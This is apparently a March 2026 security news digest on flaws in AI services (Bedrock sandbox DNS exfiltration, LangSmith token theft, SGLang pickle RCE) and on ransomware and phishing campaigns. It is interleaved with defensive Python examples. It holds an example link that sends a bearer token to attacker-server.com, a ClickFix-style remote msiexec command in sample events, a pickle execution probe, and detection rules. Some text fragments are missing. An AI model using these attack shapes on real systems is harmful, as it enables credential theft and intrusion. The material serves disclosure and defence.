2026-03-18 AI Startup News
AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE
Cybersecurity researchers have disclosed details of a new method for exfiltrating sensitive data from artificial intelligence (AI) code execution environments using domain name system (DNS) queries. In a report published Monday, BeyondTrust revealed that Amazon Bedrock AgentCore Code Interpreter’s sandbox mode permits outbound DNS queries that an attacker can exploit to enable interactive shells and bypass network isolation. The issue, which does not have a CVE identifier, carries a CVSS score of 7.5 out of 10.0. Amazon Bedrock AgentCore Code Interpreter is a fully managed service that enables AI agents to securely execute code in isolated sandbox environments, such that agentic workloads cannot access external systems.
It was launched by Amazon in August 2025. The fact that the service allows DNS queries despite “no network access” configuration can allow “threat actors to establish command-and-control channels and data exfiltration over DNS in certain scenarios, bypassing the expected network isolation controls,” Kinnaird McQuade, chief security architect at BeyondTrust, said. In an experimental attack scenario, a threat actor can abuse this behavior to set up a bidirectional communication channel using DNS queries and responses, obtain an interactive reverse shell, exfiltrate sensitive information through DNS queries if their IAM role has permissions to access AWS resources like S3 buckets storing that data, and perform command execution. What’s more, the DNS communication mechanism can be abused to deliver additional payloads that are fed to the Code Interpreter, causing it to poll the DNS command-and-control (C2) server for commands stored in DNS A records, execute them, and return the results via DNS subdomain queries.
It’s worth noting that Code Interpreter requires an IAM role to access AWS resources. However, a simple oversight can cause an overprivileged role to be assigned to the service, granting it broad permissions to access sensitive data. “This research demonstrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters,” BeyondTrust said. “By using this method, attackers could have exfiltrated sensitive data from AWS resources accessible via the Code Interpreter’s IAM role, potentially causing downtime, data breaches of sensitive customer information, or deleted infrastructure.” Following responsible disclosure in September 2025, Amazon has determined it to be intended functionality rather than a defect, urging customers to use VPC mode instead of sandbox mode for complete network isolation.
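The channel described above leaves a recognisable trace in resolver query logs: long, high-entropy leftmost labels and many distinct subdomains under one apex from a single client, which is what a Route 53 Resolver DNS Firewall rule or a query-log review can key on. The following is an added example, not BeyondTrust's or Amazon's code: a small scorer run over constructed Route 53 Resolver-style query log lines. The log layout (timestamp, client IP, query name, query type) and the thresholds are assumptions to tune for your own environment.

```python
"""Score DNS query logs for covert-channel traits (added example).

Assumptions: each log line is "timestamp client_ip query_name query_type";
the thresholds below are starting points, not calibrated values.
"""
import math
from collections import defaultdict

# Constructed sample log lines. The *.c.example.net queries mimic a sandbox
# beaconing encoded data as subdomains; the rest are ordinary lookups.
SAMPLE_LOG = """\
2026-03-16T10:00:01Z 10.0.1.5 pypi.org A
2026-03-16T10:00:02Z 10.0.1.5 files.pythonhosted.org A
2026-03-16T10:00:03Z 10.0.1.5 zlxq2a4mnrx3kbvq9d0f7ehs.c.example.net A
2026-03-16T10:00:04Z 10.0.1.5 q7w3ry9tbm2ka5dplfvn8hxz.c.example.net A
2026-03-16T10:00:05Z 10.0.1.5 c4gj6uio1esbw0kxmrtn5yhp.c.example.net TXT
2026-03-16T10:00:06Z 10.0.1.5 v2fzd8qlanwm3eb7ckxt6srj.c.example.net A
2026-03-16T10:00:07Z 10.0.1.5 s3.us-east-1.amazonaws.com A
"""

MAX_LABEL_LEN = 20          # assumption: hostnames rarely carry 20+ char labels
MIN_ENTROPY = 3.5           # bits/char; encoded data sits well above natural words
MIN_UNIQUE_SUBDOMAINS = 3   # distinct leftmost labels under one apex per client


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's symbol distribution."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def apex_domain(name: str) -> str:
    """Crude registered-domain guess: the last two labels (assumption: no
    public-suffix list is consulted, so co.uk-style apexes are mis-grouped)."""
    labels = name.rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_log(log_text: str):
    """Group queries by (client, apex), keeping the distinct leftmost labels."""
    groups = defaultdict(lambda: {"labels": set(), "queries": 0, "txt": 0})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue  # skip malformed lines rather than crash the pipeline
        _ts, client, qname, qtype = parts[:4]
        g = groups[(client, apex_domain(qname))]
        g["queries"] += 1
        g["labels"].add(qname.split(".")[0])
        if qtype.upper() in ("TXT", "NULL"):  # record types favoured for bulk data
            g["txt"] += 1
    return groups


def detect_dns_tunnels(log_text: str) -> dict:
    """Return {(client, apex): metrics} for groups that look like a DNS channel:
    enough distinct subdomains, mostly long labels, and high mean entropy."""
    findings = {}
    for key, g in parse_log(log_text).items():
        labels = g["labels"]
        mean_entropy = sum(shannon_entropy(l) for l in labels) / len(labels)
        long_share = sum(len(l) >= MAX_LABEL_LEN for l in labels) / len(labels)
        if (len(labels) >= MIN_UNIQUE_SUBDOMAINS
                and mean_entropy >= MIN_ENTROPY
                and long_share >= 0.5):
            findings[key] = {
                "queries": g["queries"],
                "unique_subdomains": len(labels),
                "mean_entropy": round(mean_entropy, 2),
                "txt_or_null_queries": g["txt"],
            }
    return findings


if __name__ == "__main__":
    for (client, apex), metrics in detect_dns_tunnels(SAMPLE_LOG).items():
        print(f"{client} -> {apex}: {metrics}")
```

The aggregate view matters more than any single query: one odd-looking label is common (CDN hashes, DKIM selectors), but a stream of distinct long random labels under one apex from one sandbox client is the beaconing pattern. Pair the scorer with the allowlist-plus-firewall approach Amazon recommends, so that anything the sandbox genuinely needs resolves and everything else is both blocked and logged.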
The tech giant is also recommending the use of a DNS firewall to filter outbound DNS traffic. “To protect sensitive workloads, administrators should inventory all active AgentCore Code Interpreter instances and immediately migrate those handling critical data from Sandbox mode to VPC mode,” Jason Soroko, senior fellow at Sectigo, said. “Operating within a VPC provides the necessary infrastructure for robust network isolation, allowing teams to implement strict security groups, network ACLs, and Route53 Resolver DNS Firewalls to monitor and block unauthorized DNS resolution. Finally, security teams must rigorously audit the IAM roles attached to these interpreters, strictly enforcing the principle of least privilege to restrict the blast radius of any potential compromise.”
LangSmith Susceptible to Account Takeover Flaw
The disclosure comes as Miggo Security disclosed a high-severity security flaw in LangSmith (CVE-2026-25750, CVSS score: 8.5) that exposed users to potential token theft and account takeover.
The issue, which affects both self-hosted and cloud deployments, has been addressed in LangSmith version 0.12.71 released in December 2025. The shortcoming has been characterized as a case of URL parameter injection stemming from a lack of validation on the baseUrl parameter, enabling an attacker to steal a signed-in user’s bearer token, user ID, and workspace ID by having them transmitted to a server under the attacker’s control. This requires social engineering, such as tricking the victim into clicking on a specially crafted link like the ones below -
Cloud - smith.langchain[.]com/studio/?baseUrl=https://attacker-server.com
Self-hosted -
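The weakness described above is a missing check on a query parameter that the front end then treats as the API origin it sends the session credentials to. As an added example (not LangSmith's code), here is the kind of validation that closes that gap: the parameter is accepted only if it resolves to a pre-approved scheme, host and port, and it is rejected on the usual tricks (credentials in the authority, look-alike suffixes, scheme-relative URLs, backslashes, an unexpected port). The allowlisted backends are assumptions.

```python
"""Validate a user-supplied baseUrl against an allowlist (added example)."""
from typing import Optional
from urllib.parse import urlsplit

# Assumption (constructed): the only backends the UI may be pointed at.
ALLOWED_BACKENDS = {
    ("https", "api.example.com", 443),
    ("http", "localhost", 1984),
}
DEFAULT_BACKEND = "https://api.example.com"


class UnsafeBaseUrl(ValueError):
    """Raised when the parameter does not resolve to an allowlisted backend."""


def resolve_base_url(param: Optional[str]) -> str:
    """Return a normalized backend URL, or raise UnsafeBaseUrl.

    The bearer token must only ever be sent to a backend on the allowlist,
    so anything that is not an exact (scheme, host, port) match is refused.
    """
    if param is None or param == "":
        return DEFAULT_BACKEND
    # Browsers treat '\' as '/', and whitespace/control characters can split
    # parsing between components; refuse them instead of trying to normalize.
    if any(ch in param for ch in "\\\r\n\t "):
        raise UnsafeBaseUrl("forbidden characters in baseUrl")
    parts = urlsplit(param)
    if parts.scheme not in ("http", "https"):
        raise UnsafeBaseUrl(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        # https://api.example.com@attacker-server.com passes a naive
        # startswith() check; urlsplit exposes the trick as userinfo.
        raise UnsafeBaseUrl("userinfo in baseUrl")
    host = parts.hostname  # already lowercased by urlsplit
    if not host:
        raise UnsafeBaseUrl("missing host")
    try:
        port = parts.port
    except ValueError as exc:  # non-numeric or out-of-range port
        raise UnsafeBaseUrl("invalid port") from exc
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if (parts.scheme, host, port) not in ALLOWED_BACKENDS:
        raise UnsafeBaseUrl(f"backend not allowlisted: {host}:{port}")
    if parts.query or parts.fragment:
        raise UnsafeBaseUrl("query/fragment not allowed in baseUrl")
    default_port = 443 if parts.scheme == "https" else 80
    authority = host if port == default_port else f"{host}:{port}"
    return f"{parts.scheme}://{authority}{parts.path.rstrip('/')}"


def is_safe_base_url(param: Optional[str]) -> bool:
    """Boolean form for handlers that prefer falling back to the default."""
    try:
        resolve_base_url(param)
        return True
    except UnsafeBaseUrl:
        return False


if __name__ == "__main__":
    for candidate in [
        "https://api.example.com/",
        "https://attacker-server.com",  # the shape of the link in the article
        "https://api.example.com@attacker-server.com",
        "https://api.example.com.attacker-server.com",
        "//attacker-server.com",
        "javascript:alert(1)",
    ]:
        print(f"{candidate!r:50} -> {is_safe_base_url(candidate)}")
```

An exact-match allowlist on the parsed (scheme, host, port) triple is deliberately stricter than a prefix or substring test: prefix tests are what the userinfo and look-alike-suffix variants in the demo are built to slip past. If the product genuinely needs arbitrary self-hosted backends, the safer design is to configure the backend origin at deploy time rather than accept it from the URL at all.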
As these tools prioritize developer flexibility, they often inadvertently bypass security guardrails. This risk is compounded because, like ‘traditional’ software, AI Agents have deep access to internal data sources and third-party services.”
Unsafe Pickle Deserialization Flaws in SGLang
Security vulnerabilities have also been flagged in SGLang, a popular open-source framework for serving large language models and multimodal AI models, which, if successfully exploited, could trigger unsafe pickle deserialization, potentially resulting in remote code execution. The vulnerabilities, discovered by Orca security researcher Igor Stepansky, remain unpatched as of writing. A brief description of the flaws is as follows -
CVE-2026-3059 (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability through the ZeroMQ (aka ZMQ) broker, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’s multimodal generation module.
CVE-2026-3060 (CVSS score: 9.8) - An unauthenticated remote code execution vulnerability through the disaggregation module, which deserializes untrusted data using pickle.loads() without authentication. It affects SGLang’s encoder parallel disaggregation system.
CVE-2026-3989 (CVSS score: 7.8) - The use of an insecure pickle.load() function without validation and proper deserialization in SGLang’s “replay_request_dump.py,” which can be exploited by providing a malicious pickle file.
“The first two allow unauthenticated remote code execution against any SGLang deployment that exposes its multimodal generation or disaggregation features to the network,” Stepansky said. “The third involves insecure deserialization in a crash dump replay utility.” In a coordinated advisory, the CERT Coordination Center (CERT/CC) said SGLang is vulnerable to CVE-2026-3059 when the multimodal generation system is enabled, and to CVE-2026-3060 when the encoder parallel disaggregation system is enabled. “If either condition is met and an attacker knows the TCP port on which the ZMQ broker is listening and can send requests to the server, they can exploit the vulnerability by sending a malicious pickle file to the broker, which will then deserialize it,” CERT/CC said. Users of SGLang are recommended to restrict access to the service interfaces and ensure they are not exposed to untrusted networks.
It’s also advised to implement adequate network segmentation and access controls to prevent unauthorized interaction with the ZeroMQ endpoints. While there is no evidence that these vulnerabilities have been exploited in the wild, it’s crucial to monitor for unexpected inbound TCP connections to the ZeroMQ broker port, unexpected child processes spawned by the SGLang Python process, file creation in unusual locations by the SGLang process, and outbound connections from the SGLang process to unexpected destinations.
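All three flaws share one root cause: pickle.loads() or pickle.load() on bytes that arrived over a socket or from a file, which lets the sender name any importable callable for the unpickler to invoke. The example below is added here and is not SGLang's code. It places the unsafe pattern the advisories describe next to two hardened options: JSON framing, which cannot express code at all, and, where an existing pickle protocol cannot be replaced immediately, an Unpickler whose find_class() admits only an allowlist of globals. The frame contents and the allowlist are constructed; the probe object references builtins.len precisely because it is harmless, and the point is that the restricted loader refuses it on the same rule that would refuse a dangerous callable.

```python
"""Unsafe pickle.loads() on broker frames next to hardened alternatives (added example)."""
import io
import json
import pickle

# Assumption: the only globals a legitimate frame ever needs. Everything else,
# including every function in os, subprocess and builtins, is refused.
ALLOWED_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses any global reference not on the allowlist."""

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def unsafe_broker_handler(frame: bytes):
    """The pattern the advisories describe: whatever reaches the broker socket
    goes straight to pickle.loads(), so the sender decides what gets called."""
    return pickle.loads(frame)


def hardened_broker_handler(frame: bytes):
    """Same broker role, JSON framing: a JSON document cannot reference code."""
    try:
        return json.loads(frame.decode("utf-8"))
    except (UnicodeDecodeError, ValueError) as exc:
        raise ValueError("rejected non-JSON frame") from exc


class _CallableProbe:
    """Constructed test object whose pickle references builtins.len.
    pickle.loads() calls it (harmlessly); the restricted loader must refuse it."""

    def __reduce__(self):
        return (len, ("probe",))


def demo() -> dict:
    """Run each loader against a benign frame and a frame carrying a global."""
    benign = pickle.dumps({"request_id": 7, "image_hashes": frozenset({"abc"})})
    probe = pickle.dumps(_CallableProbe())
    results = {
        "unsafe_benign": unsafe_broker_handler(benign)["request_id"],
        "unsafe_probe": unsafe_broker_handler(probe),  # 5: the referenced global ran
        "restricted_benign": restricted_loads(benign)["request_id"],
    }
    try:
        restricted_loads(probe)
        results["restricted_probe"] = "loaded"
    except pickle.UnpicklingError as exc:
        results["restricted_probe"] = f"refused: {exc}"
    results["json_benign"] = hardened_broker_handler(b'{"request_id": 7}')["request_id"]
    try:
        hardened_broker_handler(probe)
        results["json_probe"] = "loaded"
    except ValueError:
        results["json_probe"] = "refused"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The restricted unpickler is a containment measure, not a substitute for authentication or network isolation: it still parses attacker-controlled input with a complex stack machine, so the allowlist should stay as short as the protocol allows and the endpoint should remain unreachable from untrusted networks, as CERT/CC advises above.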
LeakNet Ransomware Uses ClickFix via Hacked Sites, Deploys Deno In-Memory Loader
The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic delivered through compromised websites as an initial access method. The use of ClickFix, where users are tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods for obtaining initial access, such as through stolen credentials acquired from initial access brokers (IABs), ReliaQuest said in a technical report published today. The second important aspect of these attacks is the use of a staged command-and-control (C2) loader built on the Deno JavaScript runtime to execute malicious payloads directly in memory. “The key takeaway here is that both entry paths lead to the same repeatable post-exploitation sequence every time,” the cybersecurity company said.
“That gives defenders something concrete to work with: known behaviors you can detect and disrupt at each stage, well before ransomware deployment, regardless of how LeakNet got in.” LeakNet first emerged in November 2024, describing itself as a “digital watchdog” and framing its activities as focused on internet freedom and transparency. According to data captured by Dragos, the group has also targeted industrial entities. The use of ClickFix to breach victims offers several advantages, the most significant being that it reduces dependence on third-party suppliers, lowers per-victim acquisition cost, and removes the operational bottleneck of waiting for valuable accounts to hit the market. In these attacks, the legitimate-but-compromised sites are used to serve fake CAPTCHA verification checks that instruct users to copy and paste a “msiexec.exe” command to the Windows Run dialog.
The attacks are not confined to a specific industry vertical, instead casting a wide net to infect as many victims as possible. The development comes as more threat actors are adopting the ClickFix playbook, as it abuses trusted, everyday workflows to entice users into running rogue commands via legitimate Windows tooling in a manner that feels routine and safe. “LeakNet’s adoption of ClickFix marks both the first documented expansion of the group’s initial access capability and a meaningful strategic shift,” ReliaQuest said. “By moving away from IABs, LeakNet removes a dependency that naturally constrained how quickly and broadly it could operate.
And because ClickFix is delivered through legitimate—but compromised—websites, it doesn’t present the same obvious signals at the network layer as attacker-owned infrastructure.” Besides the use of ClickFix to initiate the attack chain, LeakNet is assessed to be using a Deno-based loader to execute Base64-encoded JavaScript directly in memory so as to minimize on-disk evidence and evade detection. The payload is designed to fingerprint the compromised system, contact an external server to fetch next-stage malware, and enter into a polling loop that repeatedly fetches and executes additional code through Deno. Separately, ReliaQuest said it also observed an intrusion attempt in which threat actors used Microsoft Teams-based phishing to socially engineer a user into launching a payload chain that ended in a similar Deno-based loader. While the activity remains unattributed, the use of the bring your own runtime (BYOR) approach either signals a broadening of LeakNet’s initial access vectors, or that other threat actors have adopted the technique.
LeakNet’s post-compromise activity follows a consistent methodology: it starts with the use of DLL side-loading to launch a malicious DLL delivered via the loader, followed by lateral movement using PsExec, data exfiltration, and encryption. “LeakNet runs cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on the compromised system. This tells the attacker which accounts and services are already reachable without the need for requesting new credentials, so they can move faster and more deliberately,” ReliaQuest said. “For staging and exfiltration, LeakNet uses S3 buckets, exploiting the appearance of normal cloud traffic to reduce its detection footprint.” The development comes as Google revealed that Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi emerged as the top 10 ransomware brands with the most victims claimed on their data leak sites.
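The chain ReliaQuest describes gives defenders process-level signals that do not depend on which site was compromised: msiexec.exe launched from the Run dialog with a remote package, deno.exe evaluating an inline Base64 blob, cmd.exe /c klist early in the session, and the PsExec service appearing on hosts during lateral movement. The following is an added example, not ReliaQuest's code: a small rule set applied to constructed Sysmon-style process-creation events. The field names, the explorer.exe parent for Run-dialog launches, and the 40-character Base64 threshold are assumptions.

```python
"""Process-creation rules for the ClickFix -> Deno loader -> klist -> PsExec chain (added example)."""
import base64
import ntpath
import re

B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")   # assumption: loader blobs are far longer
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

# Constructed events in a Sysmon Event ID 1-like shape (assumption). The Deno
# argument is Base64 of a harmless stand-in string, not a payload.
_STAND_IN_JS = base64.b64encode(b"console.log('constructed stand-in, not a payload')").decode()
SAMPLE_EVENTS = [
    {"pid": 4101, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i https://verify-captcha.example/check.msi /qn"},
    {"pid": 4188, "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\deno.exe",
     "cmdline": f"deno.exe eval --quiet {_STAND_IN_JS}"},
    {"pid": 4300, "parent_image": r"C:\Users\u\AppData\Local\Temp\deno.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c klist"},
    {"pid": 4400, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\PSEXESVC.exe",
     "cmdline": r"C:\Windows\PSEXESVC.exe"},
    # Benign: a local installer from Downloads, and a developer's node process.
    {"pid": 5000, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\u\Downloads\7z2409-x64.msi"},
    {"pid": 5100, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": "node.exe build.js"},
]


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def rule_clickfix_msiexec(ev):
    """msiexec fetching its package from a URL; a Run-dialog launch shows
    explorer.exe as the parent, which sharpens the alert name."""
    if _base(ev["image"]) == "msiexec.exe" and REMOTE_URL.search(ev["cmdline"]):
        via_run = _base(ev["parent_image"]) == "explorer.exe"
        return "clickfix_msiexec_remote" + ("_from_run_dialog" if via_run else "")
    return None


def rule_deno_inline_b64(ev):
    """Deno evaluating a long Base64 argument: the in-memory loader stage."""
    if (_base(ev["image"]) in ("deno.exe", "deno")
            and " eval " in f" {ev['cmdline']} "
            and B64_BLOB.search(ev["cmdline"])):
        return "deno_inline_base64_eval"
    return None


def rule_klist_recon(ev):
    """cmd.exe /c klist: listing cached Kerberos tickets right after landing."""
    if _base(ev["image"]) == "cmd.exe" and re.search(r"\bklist\b", ev["cmdline"], re.I):
        return "klist_ticket_enumeration"
    return None


def rule_psexec_service(ev):
    """PSEXESVC.exe is the service PsExec installs on the remote host."""
    if _base(ev["image"]) == "psexesvc.exe":
        return "psexec_service_install"
    return None


RULES = (rule_clickfix_msiexec, rule_deno_inline_b64, rule_klist_recon, rule_psexec_service)


def detect(events) -> list:
    """Return [(pid, rule_name)] for every event that trips a rule."""
    alerts = []
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                alerts.append((ev["pid"], name))
    return alerts


if __name__ == "__main__":
    for pid, name in detect(SAMPLE_EVENTS):
        print(pid, name)
```

Each rule alone is noisy (administrators run klist; installers do use msiexec), which is why the value is in the sequence: the same parent chain moving from a Run-dialog msiexec to a Deno eval to klist within minutes is the repeatable post-exploitation pattern the report calls out, and it appears before any encryption activity.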
“In a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls,” Google Threat Intelligence Group (GTIG) said, adding 77% of analyzed ransomware intrusions included suspected data theft, an increase from 57% in 2024. “Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. Several indicators suggest the overall profitability of these operations is, however, declining, and at least some threat actors are shifting their targeting calculus away from large companies to instead focus on higher volume attacks against smaller organizations.”
AI is Everywhere, But CISOs are Still Securing It with Yesterday’s Skills and Tools, Study Finds
A majority of security leaders are struggling to defend AI systems with tools and skills that are not fit for the challenge, according to the AI and Adversarial Testing Benchmark Report 2026 from Pentera. The report, based on a survey of 300 US CISOs and senior security leaders, examines how organizations are securing AI infrastructure and highlights critical gaps tied to skills shortages and reliance on security controls not designed for the AI era.
AI adoption is outpacing security visibility
AI systems are rarely deployed in isolation. They are layered across and integrated into existing corporate technology, from cloud platforms and identity systems to applications and data pipelines.
With ownership spread across disparate teams, effective centralized oversight has collapsed. As a result, 67 percent of CISOs reported limited visibility into how AI is being used across their organization. None of the respondents indicated they have full visibility; rather, they acknowledge being aware of or accepting some form of unmanaged or unsanctioned AI usage. Without a clear view of where AI systems operate or what resources they can access, security teams struggle to assess risk effectively.
Basic questions, such as which identities AI systems rely on, what data they can reach, or how they behave when controls fail, often remain unanswered.
Skills, not budget, are the primary barrier
Although AI security is now a regular topic in boardrooms and executive discussions, the study shows that the biggest challenges are not financial. CISOs identified the following as their top obstacles to securing AI infrastructure:
Lack of internal expertise (50 percent)
Limited visibility into AI usage (48 percent)
Insufficient security tools designed specifically for AI systems (36 percent)
Only 17 percent cited budget constraints as a primary concern. This suggests that many organizations are willing to invest in AI security, but do not yet have the specialized skills needed to evaluate AI-related risks in real environments.
AI systems introduce behaviors that security teams are still learning to assess, including autonomous decision-making, indirect access paths, and privileged interaction between systems. Without the right expertise and active testing, it becomes difficult to evaluate whether existing controls are effective as intended.
Legacy controls are carrying most of the load
In the absence of AI-specific best practices, skills, and tooling, most enterprises are extending existing security controls to cover AI infrastructure. The study found that 75 percent of CISOs rely on legacy security controls, such as endpoint, application, cloud, or API security tools, to protect AI systems.
Only 11 percent reported having security tools designed specifically to secure AI infrastructure. This approach reflects a familiar pattern seen during previous technology shifts, where organizations initially adapt existing defenses before more tailored security practices emerge. While this can provide basic coverage, controls built for traditional systems may not account for how AI changes access patterns and expands potential attack paths.
A familiar challenge, now applied to AI
Taken together, the findings show that AI security challenges stem from foundational gaps rather than a lack of awareness or intent.
As AI becomes a core part of enterprise infrastructure, the report suggests that organizations will need to focus on building expertise and improving how they validate security controls across environments where AI is already operating. To explore the full findings, download the AI and Adversarial Testing Benchmark Report 2026 for a deeper discussion of the data and key takeaways.
Note: This article was written by Ryan Dory, Director, Technical Advisors at Pentera. This article is a contributed piece from one of our valued partners.
Konni Deploys EndRAT Through Phishing, Uses KakaoTalk to Propagate Malware
North Korean threat actors have been observed sending phishing to compromise targets and obtain access to a victim’s KakaoTalk desktop application to distribute malicious payloads to certain contacts. The activity has been attributed by South Korean threat intelligence firm Genians to a hacking group referred to as Konni. “Initial access was achieved through a spear-phishing email disguised as a notice appointing the recipient as a North Korean human rights lecturer,” the Genians Security Center (GSC) noted in an analysis. “After the spear-phishing attack succeeded, the victim executed a malicious LNK file, resulting in infection with remote access malware.
The malware remained concealed and persistent on the victim’s endpoint for an extended period, stealing internal documents and sensitive information.” The threat actor is said to have remained on the compromised host for an extended period of time, leveraging the unauthorized access to siphon internal documents and make use of the KakaoTalk application to selectively propagate the malware to specific contacts. The attack is notable for abusing the trust associated with compromised victims to deceive and ensnare additional targets. This is not the first time Konni has employed the messaging app as a distribution vector. In November 2025, the hacking group was found abusing signed-in KakaoTalk chat app sessions to send malicious payloads to victims’ contacts in the form of a ZIP archive, while simultaneously initiating a remote wipe of their Android devices using stolen Google credentials.
The starting point of the latest attack campaign is a spear-phishing email that’s used as a ploy to trick recipients into opening a ZIP file attachment containing a Windows shortcut (LNK). Upon execution, the LNK file downloads a next-stage payload from an external server, establishes persistence using scheduled tasks, and ultimately executes the malware, while displaying a PDF decoy document to the user as a distraction mechanism. Written in AutoIt, the downloaded malware is a remote access trojan (RAT) named EndRAT (aka EndClient RAT), which allows the operator to remotely commandeer the compromised host through capabilities like file management, remote shell access, data transfer, and persistence. Further analysis of the infected host has uncovered the presence of various malicious artifacts, including AutoIt scripts corresponding to RftRAT and Remcos RAT, indicating that the adversary deemed the victim as valuable enough to drop multiple RAT families for improved resilience.
An important aspect of the attack is the threat actor’s abuse of the victim’s KakaoTalk application installed on the infected system to distribute malicious files in the form of ZIP files to other individuals in their contact list and deploy the same malware. This essentially turns existing victims into intermediaries for further attacks. “This campaign is assessed as a multi-stage attack operation that extends beyond simple spear-phishing, combining long-term persistence, information theft, and account-based redistribution,” Genians said. “The actor selected certain contacts from the victim’s friend list and sent them additional malicious files.
In doing so, the attacker used filenames disguised as materials introducing North Korea-related content to induce recipients to open the files.”
CISA Flags Actively Exploited Wing FTP Vulnerability Leaking Server Paths
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added a medium-severity security flaw impacting Wing FTP to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The vulnerability, CVE-2025-47813 (CVSS score: 4.3), is an information disclosure vulnerability that leaks the installation path of the application under certain conditions. “Wing FTP Server contains a generation of error messages containing sensitive information vulnerability when using a long value in the UID cookie,” CISA said.
The shortcoming affects all versions of the software prior to and including version 7.4.3. The issue was addressed in version 7.4.4, shipped in May following a responsible disclosure by RCE Security researcher Julien Ahrens. It’s worth noting that version 7.4.4 also patches CVE-2025-47812 (CVSS score: 10.0), another critical bug in the same product that allows for remote code execution. As of July 2025, the vulnerability has come under active exploitation in the wild.
According to details shared by Huntress at the time, attackers have leveraged it to download and execute malicious Lua files, conduct reconnaissance, and install remote monitoring and management software. Ahrens, in a proof-of-concept (PoC) exploit, shared on GitHub, noted that the endpoint at “/loginok.html” does not properly validate the value of the “UID” session cookie. As a result, if the supplied value is longer than the maximum path size of the underlying operating system, it triggers an error message that discloses the full local server path. “Successful exploits can allow an authenticated attacker to get the local server path of the application, which can help in exploiting vulnerabilities like CVE-2025-47812,” the researcher added.
There are currently no details on how the vulnerability is being exploited in the wild, and if it’s being abused in conjunction with CVE-2025-47812. In light of the latest development, Federal Civilian Executive Branch (FCEB) agencies are recommended to apply the necessary fixes by March 30, 2026.
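The bug class above (CWE-209, error messages that carry internal detail) is easy to reproduce outside Wing FTP: any handler that builds a filesystem path from a cookie and returns the raised OSError verbatim will echo the install path as soon as the cookie exceeds the OS name limit. The example below is added here and is not Wing FTP's code; it contrasts that pattern with a handler that bounds and validates the identifier before it touches the filesystem and keeps the exception text in the server log. The session-file layout, the identifier format and the install directory are constructed.

```python
"""Path-leaking error handling next to a hardened version (added example)."""
import logging
import os
import re
import tempfile

log = logging.getLogger("ftp-session-demo")

# Constructed stand-in for the application's install directory.
INSTALL_DIR = tempfile.mkdtemp(prefix="ftpsrv-")
SESSION_DIR = os.path.join(INSTALL_DIR, "sessions")
os.makedirs(SESSION_DIR, exist_ok=True)

# Session identifiers this server issues: bounded length, restricted alphabet
# (assumption). Anything else is rejected before it reaches the filesystem.
UID_RE = re.compile(r"^[A-Za-z0-9]{16,64}$")
GENERIC_ERROR = "Invalid session"
DEMO_UID = "a1b2c3d4e5f6a7b8"


def _session_path(uid: str) -> str:
    return os.path.join(SESSION_DIR, f"sess_{uid}")


def load_session_unsafe(uid: str) -> str:
    """Cookie goes straight into a path; the OSError text, which includes the
    absolute path, is returned to the client. A cookie longer than NAME_MAX
    trips 'File name too long: <full path>'; a missing file leaks it too."""
    try:
        with open(_session_path(uid), encoding="utf-8") as f:
            return f.read()
    except OSError as exc:
        return f"Session error: {exc}"


def load_session_safe(uid: str) -> str:
    """Validate first; on any failure log the detail server-side and return a
    fixed message that reveals nothing about the deployment."""
    if not UID_RE.fullmatch(uid or ""):
        log.warning("rejected malformed session id (len=%d)", len(uid or ""))
        return GENERIC_ERROR
    try:
        with open(_session_path(uid), encoding="utf-8") as f:
            return f.read()
    except OSError as exc:
        log.warning("session lookup failed for %s: %s", uid, exc)
        return GENERIC_ERROR


def seed_session(uid: str, body: str) -> None:
    """Create a valid session file for the demo."""
    with open(_session_path(uid), "w", encoding="utf-8") as f:
        f.write(body)


def demo() -> dict:
    """Exercise both handlers with an oversized cookie and a valid session."""
    seed_session(DEMO_UID, "user=alice")
    oversized = "A" * 1000  # exceeds NAME_MAX (255) on Linux/macOS
    return {
        "unsafe_oversized": load_session_unsafe(oversized),
        "safe_oversized": load_session_safe(oversized),
        "safe_valid": load_session_safe(DEMO_UID),
        "safe_traversal": load_session_safe("../../etc/passwd"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

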